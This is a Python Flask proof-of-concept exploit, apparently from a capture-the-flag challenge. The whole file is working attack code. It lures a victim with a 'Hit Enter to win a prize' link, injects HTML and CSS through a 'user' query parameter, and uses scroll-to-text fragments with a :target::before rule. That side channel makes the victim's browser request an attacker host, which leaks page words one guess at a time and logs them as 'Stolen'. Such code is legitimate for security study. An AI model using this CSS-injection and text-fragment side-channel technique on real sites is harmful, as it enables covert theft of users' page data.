bonus_poc_exploit.py

from flask import Flask
from flask import request, send_file
import sys
import random

app = Flask(__name__)

VICTIM = "http://victim:5000"
ATTACKER = "http://attacker:1337"

fruits_all = ["Apple","Apricot","Avocado","Banana","Bilberry","Blackberry","Blackcurrant","Blueberry","Boysenberry","Currant","Cherry","Cherimoya"]

def gen_redirect(try_fruit):
    return f"""<script>
    let injection = `
    <style>
    :target::target-text {{ color:rgba(0,0,0,0%); }}
    :target::before {{ content : url({ATTACKER}/receive/{try_fruit}?{random.randint(10000,99999)}) }}
    body {{ background-image: url("{ATTACKER}/receive/bg"); background-repeat: no-repeat; background-position: center; }} 
    .game, .game > h1 {{ visibility: visible }}
    * {{ visibility: hidden }} 
    li {{ visibility: visible; color: rgba(0,0,0,0%) }}
    </style>
    <a class="game" href='{ATTACKER}/redirect' autofocus><h1>Hit Enter to play again!</h1></a>`.replaceAll('\\n', ' ');
    location = `{VICTIM}/?user=${{encodeURIComponent(injection)}}#:~:text={try_fruit}`;
</script>
    """

i = 0
extracted_fruits = []

@app.route('/redirect')
def redirect():
    global i
    i+=1
    return gen_redirect(fruits_all[i-1]) if i <= len(fruits_all) else "Thank you for cooperation"

@app.route('/')
def solve():
    return f"""<a href='{ATTACKER}/redirect' autofocus>Hit Enter key to win a prize!</a><script>"""

@app.route('/receive/<word>')
def receiver(word):
    global extracted_fruits
    if not word == "bg": extracted_fruits.append(word)
    print("Stolen: ", extracted_fruits, flush=True, file=sys.stdout)
    return send_file("won.png", mimetype='image/png') if not word == "bg" else send_file("bg.jpg", mimetype='image/jpeg')

@app.after_request
def add_header(response):
    response.headers['Cache-Control'] = 'no-store'
    return response